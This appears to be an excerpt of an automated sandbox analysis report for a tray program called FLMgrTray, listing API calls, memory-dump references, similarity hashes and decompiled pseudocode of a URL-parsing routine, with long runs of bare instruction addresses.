                                                                                        0x001825bb
                                                                                        0x001825c3
                                                                                        0x001825d3
                                                                                        0x001825d9
                                                                                        0x001825d9
                                                                                        0x001825b2
                                                                                        0x001825de
                                                                                        0x001825e5
                                                                                        0x001825f0
                                                                                        0x001825f8
                                                                                        0x00182600
                                                                                        0x00182607
                                                                                        0x00182611
                                                                                        0x0018261f
                                                                                        0x00182626
                                                                                        0x00182626
                                                                                        0x00182631
                                                                                        0x00182648

                                                                                        APIs
                                                                                        • RegFlushKey.ADVAPI32(00000000,2C80D730,?,00000001), ref: 001825BB
                                                                                        • RegCloseKey.ADVAPI32(?,2C80D730,?,00000001), ref: 001825C3
                                                                                        • GetVersionExW.KERNEL32(00000001,2C80D730,?), ref: 00182611
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseFlushVersion
                                                                                        • String ID:
                                                                                        • API String ID: 2016002339-0
                                                                                        • Opcode ID: ca12005f36b2baa7150f0f4238c3d416b1aa747ae802bd4b6fee57b04a869eef
                                                                                        • Instruction ID: 42186c7886b0953eab89b22551bd076bfb4485af9acfbd68be86f17fee12584e
                                                                                        • Opcode Fuzzy Hash: ca12005f36b2baa7150f0f4238c3d416b1aa747ae802bd4b6fee57b04a869eef
                                                                                        • Instruction Fuzzy Hash: 8F316870A04744DFDB31DF25D844B96BBF4FB08704F10856EE88A87A91D7B5AA84CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalLeaveSection
                                                                                        • String ID:
                                                                                        • API String ID: 3988221542-0
                                                                                        • Opcode ID: cd086dbca43ef4998309ff1b3a6942899f70c919c816fd16becce7088cb39a62
                                                                                        • Instruction ID: 24e4d589e4193b5d84d793bcec1b53bbe884d9ad5ce206c4804cc33e803e3a0a
                                                                                        • Opcode Fuzzy Hash: cd086dbca43ef4998309ff1b3a6942899f70c919c816fd16becce7088cb39a62
                                                                                        • Instruction Fuzzy Hash: 75E08675A45988DBC714DF49D851B56B3A8E709B10F50427EEC17C3B80DB3568008A90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ??1CMenuWnd@DuiLib@@QAE@XZ.DUILIB(2C80D730), ref: 00162D2B
                                                                                        • ??0CMenuWnd@DuiLib@@QAE@XZ.DUILIB ref: 00162D69
                                                                                        • ??0CDuiPoint@DuiLib@@QAE@XZ.DUILIB ref: 00162D86
                                                                                        • GetCursorPos.USER32(?), ref: 00162D93
                                                                                        • ?Init@CMenuWnd@DuiLib@@QAEXPAVCMenuElementUI@2@VSTRINGorID@2@UtagPOINT@@PAVCPaintManagerUI@2@PAVCStdStringPtrMap@2@K@Z.DUILIB(00000000,?,00000006,?,?,00000000,00000006), ref: 00162DC8
                                                                                        • PostQuitMessage.USER32(00000000,2C80D730), ref: 00162908
                                                                                          • Part of subcall function 00175B7B: EnterCriticalSection.KERNEL32(0019DC18,00000000,00000000,?,0018201C,0019DFA8,001611E2), ref: 00175B86
                                                                                          • Part of subcall function 00175B7B: LeaveCriticalSection.KERNEL32(0019DC18,?,0018201C,0019DFA8,001611E2), ref: 00175BC3
                                                                                        • ?GetIcon@CTrayIcon@DuiLib@@QBEPAUHICON__@@XZ.DUILIB(2C80D730), ref: 0016297E
                                                                                        • Shell_NotifyIconW.SHELL32(00000000,000003BC), ref: 001629A6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Lib@@$Menu$Wnd@$CriticalI@2@Icon@Section$CursorD@2@ElementEnterIconInit@LeaveManagerMap@2@MessageN__@@NotifyPaintPoint@PostQuitShell_StringTrayUtag
                                                                                        • String ID: 33333333$@MFBEY@eXPRMZ@open$exit$get off$menu.xml$pc_tray_off.txt$setting
                                                                                        • API String ID: 1035403497-3125121549
                                                                                        • Opcode ID: de65e0e7859e9ca41c97f0a8ac191289abfa392b2e0d1cdc6d2678951e85ffa9
                                                                                        • Instruction ID: a0986042df64eac4b82ffa8ebc6f2c23d661354317cd798059ef8db5a5452fea
                                                                                        • Opcode Fuzzy Hash: de65e0e7859e9ca41c97f0a8ac191289abfa392b2e0d1cdc6d2678951e85ffa9
                                                                                        • Instruction Fuzzy Hash: 74F11171E006088BDB15EB74CC46BEDB7B4BF15344F10832AE905B7691EB746B92CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 40%
                                                                                        			E00186FE0(intOrPtr* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, short* _a28) {
                                                                                        				signed int _v8;
                                                                                        				char _v1032;
                                                                                        				char _v1033;
                                                                                        				intOrPtr _v1040;
                                                                                        				intOrPtr _v1044;
                                                                                        				signed int _v1048;
                                                                                        				intOrPtr* _v1052;
                                                                                        				intOrPtr _v1056;
                                                                                        				intOrPtr _v1060;
                                                                                        				intOrPtr _v1064;
                                                                                        				short* _v1068;
                                                                                        				void* __ebp;
                                                                                        				signed int _t94;
                                                                                        				intOrPtr _t101;
                                                                                        				int _t104;
                                                                                        				intOrPtr _t106;
                                                                                        				intOrPtr _t107;
                                                                                        				intOrPtr _t108;
                                                                                        				signed int _t109;
                                                                                        				signed int _t110;
                                                                                        				signed int _t111;
                                                                                        				signed int _t112;
                                                                                        				intOrPtr _t113;
                                                                                        				intOrPtr _t116;
                                                                                        				intOrPtr _t117;
                                                                                        				int _t120;
                                                                                        				intOrPtr _t130;
                                                                                        				intOrPtr _t134;
                                                                                        				int _t136;
                                                                                        				intOrPtr _t137;
                                                                                        				intOrPtr _t138;
                                                                                        				intOrPtr _t148;
                                                                                        				int _t150;
                                                                                        				intOrPtr _t151;
                                                                                        				intOrPtr _t152;
                                                                                        				intOrPtr _t153;
                                                                                        				intOrPtr _t157;
                                                                                        				int _t159;
                                                                                        				intOrPtr _t160;
                                                                                        				intOrPtr* _t161;
                                                                                        				intOrPtr* _t162;
                                                                                        				intOrPtr* _t164;
                                                                                        				intOrPtr* _t166;
                                                                                        				intOrPtr* _t168;
                                                                                        				intOrPtr* _t170;
                                                                                        				intOrPtr* _t172;
                                                                                        				intOrPtr _t173;
                                                                                        				void* _t175;
                                                                                        				intOrPtr* _t176;
                                                                                        				intOrPtr* _t177;
                                                                                        				void* _t181;
                                                                                        				intOrPtr* _t182;
                                                                                        				intOrPtr _t189;
                                                                                        				intOrPtr* _t192;
                                                                                        				intOrPtr* _t194;
                                                                                        				intOrPtr* _t196;
                                                                                        				void* _t199;
                                                                                        				void* _t201;
                                                                                        				intOrPtr* _t202;
                                                                                        				intOrPtr* _t204;
                                                                                        				intOrPtr* _t206;
                                                                                        				intOrPtr* _t208;
                                                                                        				intOrPtr* _t210;
                                                                                        				intOrPtr* _t212;
                                                                                        				void* _t214;
                                                                                        				void* _t215;
                                                                                        				void* _t216;
                                                                                        				void* _t217;
                                                                                        				void* _t218;
                                                                                        				void* _t220;
                                                                                        				void* _t221;
                                                                                        				intOrPtr* _t222;
                                                                                        				void* _t223;
                                                                                        				intOrPtr _t225;
                                                                                        				void* _t226;
                                                                                        				void* _t227;
                                                                                        				void* _t228;
                                                                                        				void* _t229;
                                                                                        				void* _t230;
                                                                                        				void* _t231;
                                                                                        				void* _t232;
                                                                                        				void* _t233;
                                                                                        				void* _t234;
                                                                                        				signed int _t235;
                                                                                        				intOrPtr _t237;
                                                                                        				void* _t238;
                                                                                        				intOrPtr _t239;
                                                                                        				char* _t240;
                                                                                        				intOrPtr* _t241;
                                                                                        				intOrPtr _t242;
                                                                                        				signed int _t243;
                                                                                        				intOrPtr _t244;
                                                                                        				intOrPtr _t245;
                                                                                        				void* _t246;
                                                                                        				void* _t247;
                                                                                        				void* _t248;
                                                                                        				intOrPtr _t249;
                                                                                        				signed int _t250;
                                                                                        				void* _t251;
                                                                                        				void* _t252;
                                                                                        
                                                                                        				_t94 =  *0x19d05c; // 0x2c80d730
                                                                                        				_v8 = _t94 ^ _t250;
                                                                                        				_v1060 = _a12;
                                                                                        				_t161 = _a4;
                                                                                        				_t162 = _t161;
                                                                                        				_v1064 = _a16;
                                                                                        				_v1056 = _a20;
                                                                                        				_t214 = _t162 + 1;
                                                                                        				_t243 = 0;
                                                                                        				_t235 = _a8;
                                                                                        				_v1052 = _a24;
                                                                                        				_v1048 = _t235;
                                                                                        				_v1068 = _a28;
                                                                                        				_v1033 = 0;
                                                                                        				do {
                                                                                        					_t101 =  *_t162;
                                                                                        					_t162 = _t162 + 1;
                                                                                        				} while (_t101 != 0);
                                                                                        				if(_t162 != _t214) {
                                                                                        					do {
                                                                                        						_t210 = _t161;
                                                                                        						_t233 = _t210 + 1;
                                                                                        						do {
                                                                                        							_t157 =  *_t210;
                                                                                        							_t210 = _t210 + 1;
                                                                                        						} while (_t157 != 0);
                                                                                        						if(_t243 < _t210 - _t233) {
                                                                                        							_t159 = strncmp(_t161 + _t243, ":", 1);
                                                                                        							_t251 = _t251 + 0xc;
                                                                                        							if(_t159 != 0) {
                                                                                        								_t212 = _t161;
                                                                                        								_t243 = _t243 + 1;
                                                                                        								_t234 = _t212 + 1;
                                                                                        								do {
                                                                                        									_t160 =  *_t212;
                                                                                        									_t212 = _t212 + 1;
                                                                                        								} while (_t160 != 0);
                                                                                        								goto L10;
                                                                                        							}
                                                                                        						}
                                                                                        						goto L11;
                                                                                        						L10:
                                                                                        					} while (_t212 != _t234);
                                                                                        				}
                                                                                        				L11:
                                                                                        				_t104 = strncmp(_t161 + 1 + _t243, "/", 1);
                                                                                        				_t164 = __imp__strncpy_s;
                                                                                        				_t252 = _t251 + 0xc;
                                                                                        				if(_t104 != 0) {
                                                                                        					if(_t235 != 0) {
                                                                                        						 *_t164(_t235, 5, "http", 4);
                                                                                        						_t252 = _t252 + 0x10;
                                                                                        						 *((char*)(_t235 + 5)) = 0;
                                                                                        					}
                                                                                        				} else {
                                                                                        					if(_t235 != 0) {
                                                                                        						_t21 = _t243 + 1; // 0x2
                                                                                        						 *_t164(_t235, _t21, _t161, _t243);
                                                                                        						_t252 = _t252 + 0x10;
                                                                                        						 *((char*)(_t235 + _t243)) = 0;
                                                                                        					}
                                                                                        				}
                                                                                        				_t25 = _t243 + 3; // 0x3
                                                                                        				_t237 =  ==  ? 0 : _t25;
                                                                                        				_t166 = _t161;
                                                                                        				_v1044 = _t237;
                                                                                        				_t215 = _t166 + 1;
                                                                                        				do {
                                                                                        					_t106 =  *_t166;
                                                                                        					_t166 = _t166 + 1;
                                                                                        				} while (_t106 != 0);
                                                                                        				_v1040 = _t237;
                                                                                        				_t244 = _t237;
                                                                                        				if(_t166 != _t215) {
                                                                                        					do {
                                                                                        						_t206 = _t161;
                                                                                        						_t231 = _t206 + 1;
                                                                                        						do {
                                                                                        							_t152 =  *_t206;
                                                                                        							_t206 = _t206 + 1;
                                                                                        						} while (_t152 != 0);
                                                                                        						if(_t244 < _t206 - _t231) {
                                                                                        							_t208 = _t161;
                                                                                        							_t244 = _t244 + 1;
                                                                                        							_t232 = _t208 + 1;
                                                                                        							do {
                                                                                        								_t153 =  *_t208;
                                                                                        								_t208 = _t208 + 1;
                                                                                        							} while (_t153 != 0);
                                                                                        							goto L26;
                                                                                        						}
                                                                                        						break;
                                                                                        						L26:
                                                                                        					} while (_t208 != _t232);
                                                                                        					_v1040 = _t244;
                                                                                        				}
                                                                                        				_t168 = _t161;
                                                                                        				_t216 = _t168 + 1;
                                                                                        				do {
                                                                                        					_t107 =  *_t168;
                                                                                        					_t168 = _t168 + 1;
                                                                                        				} while (_t107 != 0);
                                                                                        				if(_t244 < _t168 - _t216) {
                                                                                        					_t196 = _t161;
                                                                                        					_t249 = _t237;
                                                                                        					_t228 = _t196 + 1;
                                                                                        					do {
                                                                                        						_t138 =  *_t196;
                                                                                        						_t196 = _t196 + 1;
                                                                                        					} while (_t138 != 0);
                                                                                        					if(_t196 != _t228) {
                                                                                        						do {
                                                                                        							_t202 = _t161;
                                                                                        							_t229 = _t202 + 1;
                                                                                        							do {
                                                                                        								_t148 =  *_t202;
                                                                                        								_t202 = _t202 + 1;
                                                                                        							} while (_t148 != 0);
                                                                                        							if(_t237 < _t202 - _t229) {
                                                                                        								_t150 = strncmp(_t161 + _t249, ":", 1);
                                                                                        								_t252 = _t252 + 0xc;
                                                                                        								if(_t150 != 0) {
                                                                                        									_t204 = _t161;
                                                                                        									_t249 = _t249 + 1;
                                                                                        									_t230 = _t204 + 1;
                                                                                        									do {
                                                                                        										_t151 =  *_t204;
                                                                                        										_t204 = _t204 + 1;
                                                                                        									} while (_t151 != 0);
                                                                                        									goto L40;
                                                                                        								}
                                                                                        							}
                                                                                        							goto L41;
                                                                                        							L40:
                                                                                        						} while (_t204 != _t230);
                                                                                        					}
                                                                                        					L41:
                                                                                        					if(_t249 >= _v1040) {
                                                                                        						_t242 = _v1040;
                                                                                        					} else {
                                                                                        						_t199 = _t249 - _t237;
                                                                                        						__imp__strncpy_s(_v1060, _t199 + 1, _t237 + _t161, _t199);
                                                                                        						_t242 = _v1040;
                                                                                        						_t201 = _t242 - _t249;
                                                                                        						 *((char*)(_v1060 - _t237 + _t249 + 1)) = 0;
                                                                                        						__imp__strncpy_s(_v1064, _t201, _t161 + 1 + _t249, _t201 - 1);
                                                                                        						_t252 = _t252 + 0x20;
                                                                                        						 *((char*)(_v1064 - _t249 + _t242)) = 0;
                                                                                        					}
                                                                                        					_t237 = _t242 + 1;
                                                                                        					_v1044 = _t237;
                                                                                        				}
                                                                                        				_t170 = _t161;
                                                                                        				_v1040 = _t237;
                                                                                        				_t245 = _t237;
                                                                                        				_v1060 = _t245;
                                                                                        				_t217 = _t170 + 1;
                                                                                        				do {
                                                                                        					_t108 =  *_t170;
                                                                                        					_t170 = _t170 + 1;
                                                                                        				} while (_t108 != 0);
                                                                                        				if(_t170 != _t217) {
                                                                                        					do {
                                                                                        						_t192 = _t161;
                                                                                        						_t226 = _t192 + 1;
                                                                                        						do {
                                                                                        							_t134 =  *_t192;
                                                                                        							_t192 = _t192 + 1;
                                                                                        						} while (_t134 != 0);
                                                                                        						if(_t237 < _t192 - _t226) {
                                                                                        							_t136 = strncmp(_t161 + _t237, "/", 1);
                                                                                        							_t252 = _t252 + 0xc;
                                                                                        							if(_t136 != 0) {
                                                                                        								_t194 = _t161;
                                                                                        								_t237 = _t237 + 1;
                                                                                        								_t227 = _t194 + 1;
                                                                                        								do {
                                                                                        									_t137 =  *_t194;
                                                                                        									_t194 = _t194 + 1;
                                                                                        								} while (_t137 != 0);
                                                                                        								goto L55;
                                                                                        							}
                                                                                        						}
                                                                                        						break;
                                                                                        						L55:
                                                                                        					} while (_t194 != _t227);
                                                                                        					_v1044 = _t237;
                                                                                        				}
                                                                                        				if(_t245 > _t237) {
                                                                                        					L60:
                                                                                        					_t109 = _v1048;
                                                                                        					_t172 = "https";
                                                                                        					while(1) {
                                                                                        						_t218 =  *_t109;
                                                                                        						if(_t218 !=  *_t172) {
                                                                                        							break;
                                                                                        						}
                                                                                        						if(_t218 == 0) {
                                                                                        							L65:
                                                                                        							_t110 = 0;
                                                                                        						} else {
                                                                                        							_t225 =  *((intOrPtr*)(_t109 + 1));
                                                                                        							if(_t225 !=  *((intOrPtr*)(_t172 + 1))) {
                                                                                        								break;
                                                                                        							} else {
                                                                                        								_t109 = _t109 + 2;
                                                                                        								_t172 = _t172 + 2;
                                                                                        								if(_t225 != 0) {
                                                                                        									continue;
                                                                                        								} else {
                                                                                        									goto L65;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						L68:
                                                                                        						_t173 = _v1040;
                                                                                        						_t220 = _t237 - _t173;
                                                                                        						_t246 = _t173 + _t161;
                                                                                        						_t75 = _t220 + 1; // 0x4
                                                                                        						_t238 = _t75;
                                                                                        						if(_t110 != 0) {
                                                                                        							_t111 = "ftp";
                                                                                        							while(1) {
                                                                                        								_t175 =  *_v1048;
                                                                                        								if(_t175 !=  *_t111) {
                                                                                        									break;
                                                                                        								}
                                                                                        								if(_t175 == 0) {
                                                                                        									L75:
                                                                                        									_t112 = 0;
                                                                                        								} else {
                                                                                        									_t189 =  *((intOrPtr*)(_v1048 + 1));
                                                                                        									if(_t189 !=  *((intOrPtr*)(_t111 + 1))) {
                                                                                        										break;
                                                                                        									} else {
                                                                                        										_v1048 = _v1048 + 2;
                                                                                        										_t111 = _t111 + 2;
                                                                                        										if(_t189 != 0) {
                                                                                        											continue;
                                                                                        										} else {
                                                                                        											goto L75;
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        								L77:
                                                                                        								_t176 = _v1052;
                                                                                        								if(_t112 != 0) {
                                                                                        									 *_t176 = 0x50;
                                                                                        								} else {
                                                                                        									 *_t176 = 0x15;
                                                                                        								}
                                                                                        								goto L80;
                                                                                        							}
                                                                                        							asm("sbb eax, eax");
                                                                                        							_t112 = _t111 | 0x00000001;
                                                                                        							goto L77;
                                                                                        						} else {
                                                                                        							 *_v1052 = 0x1bb;
                                                                                        						}
                                                                                        						L80:
                                                                                        						__imp__strncpy_s(_v1056, _t238, _t246, _t220);
                                                                                        						goto L81;
                                                                                        					}
                                                                                        					asm("sbb eax, eax");
                                                                                        					_t110 = _t109 | 0x00000001;
                                                                                        					goto L68;
                                                                                        				} else {
                                                                                        					while(1) {
                                                                                        						_t240 = _t161 + _t245;
                                                                                        						_t120 = strncmp(_t240, ":", 1);
                                                                                        						_t252 = _t252 + 0xc;
                                                                                        						if(_t120 == 0) {
                                                                                        							break;
                                                                                        						}
                                                                                        						_t237 = _v1044;
                                                                                        						_t245 = _t245 + 1;
                                                                                        						if(_t245 <= _t237) {
                                                                                        							continue;
                                                                                        						} else {
                                                                                        							goto L60;
                                                                                        						}
                                                                                        						goto L81;
                                                                                        					}
                                                                                        					memset( &_v1032, 0, 0x400);
                                                                                        					_t66 =  &(_t240[1]); // 0x4
                                                                                        					_t241 = __imp__strncpy_s;
                                                                                        					 *_t241( &_v1032, 0x400, _t66, _v1044 - _t245);
                                                                                        					 *_v1052 = atoi( &_v1032);
                                                                                        					_t130 = _v1060;
                                                                                        					_t248 = _t245 - _t130;
                                                                                        					_t71 = _t248 + 1; // 0x4
                                                                                        					 *_t241(_v1056, _t71, _t130 + _t161, _t248);
                                                                                        				}
                                                                                        				L81:
                                                                                        				_t177 = _t161;
                                                                                        				_t221 = _t177 + 1;
                                                                                        				do {
                                                                                        					_t113 =  *_t177;
                                                                                        					_t177 = _t177 + 1;
                                                                                        				} while (_t113 != 0);
                                                                                        				_t239 = _v1044;
                                                                                        				if(_t239 >= _t177 - _t221) {
                                                                                        					 *_v1068 = 0x2f;
                                                                                        					return E001755F4(_v8 ^ _t250);
                                                                                        				} else {
                                                                                        					_t222 = _t161;
                                                                                        					_t181 = _t222 + 1;
                                                                                        					do {
                                                                                        						_t116 =  *_t222;
                                                                                        						_t222 = _t222 + 1;
                                                                                        					} while (_t116 != 0);
                                                                                        					_t223 = _t222 - _t181;
                                                                                        					_t182 = _t161;
                                                                                        					_t247 = _t182 + 1;
                                                                                        					do {
                                                                                        						_t117 =  *_t182;
                                                                                        						_t182 = _t182 + 1;
                                                                                        					} while (_t117 != 0);
                                                                                        					__imp__strncpy_s(_v1068, _t182 - _t247 - _t239 + 1, _t161 + _t239, _t223 - _t239);
                                                                                        					return E001755F4(_v8 ^ _t250);
                                                                                        				}
                                                                                        			}







































































































                                                                                        0x00186fe9
                                                                                        0x00186ff0
                                                                                        0x00186ff6
                                                                                        0x00187000
                                                                                        0x00187003
                                                                                        0x00187005
                                                                                        0x0018700f
                                                                                        0x00187015
                                                                                        0x0018701b
                                                                                        0x0018701e
                                                                                        0x00187021
                                                                                        0x0018702a
                                                                                        0x00187030
                                                                                        0x00187036
                                                                                        0x00187040
                                                                                        0x00187040
                                                                                        0x00187042
                                                                                        0x00187043
                                                                                        0x00187049
                                                                                        0x00187050
                                                                                        0x00187050
                                                                                        0x00187052
                                                                                        0x00187055
                                                                                        0x00187055
                                                                                        0x00187057
                                                                                        0x00187058
                                                                                        0x00187060
                                                                                        0x0018706d
                                                                                        0x00187073
                                                                                        0x00187078
                                                                                        0x0018707a
                                                                                        0x0018707c
                                                                                        0x0018707d
                                                                                        0x00187080
                                                                                        0x00187080
                                                                                        0x00187082
                                                                                        0x00187083
                                                                                        0x00000000
                                                                                        0x00187080
                                                                                        0x00187078
                                                                                        0x00000000
                                                                                        0x00187087
                                                                                        0x00187087
                                                                                        0x00187050
                                                                                        0x0018708b
                                                                                        0x00187098
                                                                                        0x0018709e
                                                                                        0x001870a4
                                                                                        0x001870a9
                                                                                        0x001870c5
                                                                                        0x001870d1
                                                                                        0x001870d3
                                                                                        0x001870d6
                                                                                        0x001870d6
                                                                                        0x001870ab
                                                                                        0x001870ad
                                                                                        0x001870b1
                                                                                        0x001870b6
                                                                                        0x001870b8
                                                                                        0x001870bb
                                                                                        0x001870bb
                                                                                        0x001870bf
                                                                                        0x001870e2
                                                                                        0x001870e7
                                                                                        0x001870ea
                                                                                        0x001870ec
                                                                                        0x001870f2
                                                                                        0x001870f5
                                                                                        0x001870f5
                                                                                        0x001870f7
                                                                                        0x001870f8
                                                                                        0x001870fc
                                                                                        0x00187102
                                                                                        0x00187106
                                                                                        0x00187108
                                                                                        0x00187108
                                                                                        0x0018710a
                                                                                        0x00187110
                                                                                        0x00187110
                                                                                        0x00187112
                                                                                        0x00187113
                                                                                        0x0018711b
                                                                                        0x0018711d
                                                                                        0x0018711f
                                                                                        0x00187120
                                                                                        0x00187123
                                                                                        0x00187123
                                                                                        0x00187125
                                                                                        0x00187126
                                                                                        0x00000000
                                                                                        0x00187123
                                                                                        0x00000000
                                                                                        0x0018712a
                                                                                        0x0018712a
                                                                                        0x0018712e
                                                                                        0x0018712e
                                                                                        0x00187134
                                                                                        0x00187136
                                                                                        0x00187140
                                                                                        0x00187140
                                                                                        0x00187142
                                                                                        0x00187143
                                                                                        0x0018714b
                                                                                        0x00187151
                                                                                        0x00187153
                                                                                        0x00187155
                                                                                        0x00187158
                                                                                        0x00187158
                                                                                        0x0018715a
                                                                                        0x0018715b
                                                                                        0x00187161
                                                                                        0x00187163
                                                                                        0x00187163
                                                                                        0x00187165
                                                                                        0x00187168
                                                                                        0x00187168
                                                                                        0x0018716a
                                                                                        0x0018716b
                                                                                        0x00187173
                                                                                        0x00187180
                                                                                        0x00187186
                                                                                        0x0018718b
                                                                                        0x0018718d
                                                                                        0x0018718f
                                                                                        0x00187190
                                                                                        0x00187193
                                                                                        0x00187193
                                                                                        0x00187195
                                                                                        0x00187196
                                                                                        0x00000000
                                                                                        0x00187193
                                                                                        0x0018718b
                                                                                        0x00000000
                                                                                        0x0018719a
                                                                                        0x0018719a
                                                                                        0x00187163
                                                                                        0x0018719e
                                                                                        0x001871a4
                                                                                        0x001871fe
                                                                                        0x001871a6
                                                                                        0x001871ab
                                                                                        0x001871b9
                                                                                        0x001871c7
                                                                                        0x001871cf
                                                                                        0x001871d1
                                                                                        0x001871e7
                                                                                        0x001871f3
                                                                                        0x001871f8
                                                                                        0x001871f8
                                                                                        0x00187204
                                                                                        0x00187205
                                                                                        0x00187205
                                                                                        0x0018720b
                                                                                        0x0018720d
                                                                                        0x00187213
                                                                                        0x00187215
                                                                                        0x0018721b
                                                                                        0x00187220
                                                                                        0x00187220
                                                                                        0x00187222
                                                                                        0x00187223
                                                                                        0x00187229
                                                                                        0x00187230
                                                                                        0x00187230
                                                                                        0x00187232
                                                                                        0x00187235
                                                                                        0x00187235
                                                                                        0x00187237
                                                                                        0x00187238
                                                                                        0x00187240
                                                                                        0x0018724d
                                                                                        0x00187253
                                                                                        0x00187258
                                                                                        0x0018725a
                                                                                        0x0018725c
                                                                                        0x0018725d
                                                                                        0x00187260
                                                                                        0x00187260
                                                                                        0x00187262
                                                                                        0x00187263
                                                                                        0x00000000
                                                                                        0x00187260
                                                                                        0x00187258
                                                                                        0x00000000
                                                                                        0x00187267
                                                                                        0x00187267
                                                                                        0x0018726b
                                                                                        0x0018726b
                                                                                        0x00187273
                                                                                        0x00187298
                                                                                        0x00187298
                                                                                        0x0018729e
                                                                                        0x001872a3
                                                                                        0x001872a3
                                                                                        0x001872a7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001872af
                                                                                        0x001872c3
                                                                                        0x001872c3
                                                                                        0x001872b1
                                                                                        0x001872b1
                                                                                        0x001872b7
                                                                                        0x00000000
                                                                                        0x001872b9
                                                                                        0x001872b9
                                                                                        0x001872bc
                                                                                        0x001872c1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001872c1
                                                                                        0x001872b7
                                                                                        0x00187335
                                                                                        0x00187335
                                                                                        0x0018733d
                                                                                        0x0018733f
                                                                                        0x00187342
                                                                                        0x00187342
                                                                                        0x00187347
                                                                                        0x00187357
                                                                                        0x00187360
                                                                                        0x00187366
                                                                                        0x0018736a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018736e
                                                                                        0x0018738c
                                                                                        0x0018738c
                                                                                        0x00187370
                                                                                        0x00187376
                                                                                        0x0018737c
                                                                                        0x00000000
                                                                                        0x0018737e
                                                                                        0x0018737e
                                                                                        0x00187385
                                                                                        0x0018738a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018738a
                                                                                        0x0018737c
                                                                                        0x00187395
                                                                                        0x00187395
                                                                                        0x0018739d
                                                                                        0x001873a7
                                                                                        0x0018739f
                                                                                        0x0018739f
                                                                                        0x0018739f
                                                                                        0x00000000
                                                                                        0x0018739d
                                                                                        0x00187390
                                                                                        0x00187392
                                                                                        0x00000000
                                                                                        0x00187349
                                                                                        0x0018734f
                                                                                        0x0018734f
                                                                                        0x001873ad
                                                                                        0x001873b6
                                                                                        0x00000000
                                                                                        0x001873bc
                                                                                        0x00187330
                                                                                        0x00187332
                                                                                        0x00000000
                                                                                        0x00187275
                                                                                        0x00187275
                                                                                        0x00187277
                                                                                        0x00187280
                                                                                        0x00187286
                                                                                        0x0018728b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018728d
                                                                                        0x00187293
                                                                                        0x00187296
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00187296
                                                                                        0x001872d5
                                                                                        0x001872e3
                                                                                        0x001872e6
                                                                                        0x001872f9
                                                                                        0x0018730e
                                                                                        0x00187310
                                                                                        0x00187316
                                                                                        0x0018731c
                                                                                        0x00187326
                                                                                        0x00187328
                                                                                        0x001873bf
                                                                                        0x001873bf
                                                                                        0x001873c1
                                                                                        0x001873c4
                                                                                        0x001873c4
                                                                                        0x001873c6
                                                                                        0x001873c7
                                                                                        0x001873cb
                                                                                        0x001873d5
                                                                                        0x00187431
                                                                                        0x0018743f
                                                                                        0x001873d7
                                                                                        0x001873d7
                                                                                        0x001873d9
                                                                                        0x001873e0
                                                                                        0x001873e0
                                                                                        0x001873e2
                                                                                        0x001873e3
                                                                                        0x001873e7
                                                                                        0x001873e9
                                                                                        0x001873eb
                                                                                        0x001873f0
                                                                                        0x001873f0
                                                                                        0x001873f2
                                                                                        0x001873f3
                                                                                        0x0018740a
                                                                                        0x00187423
                                                                                        0x00187423

                                                                                        APIs
                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00191ED0,00000001,?,?,2C80D730), ref: 0018706D
